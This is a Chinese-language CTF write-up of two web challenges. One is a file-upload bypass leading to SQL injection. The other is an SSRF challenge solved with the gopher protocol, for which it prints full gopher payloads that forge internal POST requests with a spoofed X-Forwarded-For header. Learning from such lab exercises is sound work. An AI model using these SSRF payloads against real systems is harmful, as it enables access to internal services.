好久没有更新了,发现一个月前写的复现还没发布,小小上传一下(忘记下载题目了 只能干巴巴看了 没办法复现了呜呜呜
近期都在学习开发和python,关于web的实在是吐不出什么 等过段时间有空了再继续学习和更新web吧呜呜呜
1.upload
是很熟悉的upload题,按照惯例上传个木马看看
显然是对文件content-type的检验,用Bp抓包改包
回显文件存储路径,访问一下
发现并不解析php。看到题目说和sql注入有关,那么就浅浅找一下注入点
常规报错注入()
2.sign_in
知道是ssrf漏洞但是当时打的时候只想到传参/flag.txt,硬是找不到目录
看了wp才知道是ssrf+gopher协议 涨知识啦
1)gopher协议
Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。
Gopher协议格式:
URL:gopher://<host>:<port>/<gopher-path>_后接上TCP数据流
Gopher发送请求HTTP GET请求:
在gopher协议中发送HTTP的数据,需要以下三步:
1、构造HTTP数据包
2、URL编码、替换回车换行为%0d%0a
3、发送gopher协议
题目
打开题目就是源码
看到curl差不多就是可以想到gopher协议
直接构造一个http数据包,进行url编码,直接进行传参即可
gopher://172.73.23.100:80/_POST / HTTP/1.1
Host: 172.73.23.100:80
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Length: 3
b=1
记得url编码:
1、问号(?)需要转码为URL编码,也就是%3f
2、回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a
3、在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)
或者(某大佬的wp参数 这个确实没看懂)
gopher%3A//172.73.25.100%3A80/_POST%2520/index.php%253Fa%253D11111%2520HTTP/1.1%250D%250AHost%253A%2520172.73.25.100%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AX-forwarded-for%253A%2520127.0.0.1%250D%250AReferer%253A%2520bolean.club%250D%250AContent-Length%253A%252036%250D%250A%250D%250Ab%253Dc384d200658f258e5b5c681bf0aa29a811%250D%250A
得到flag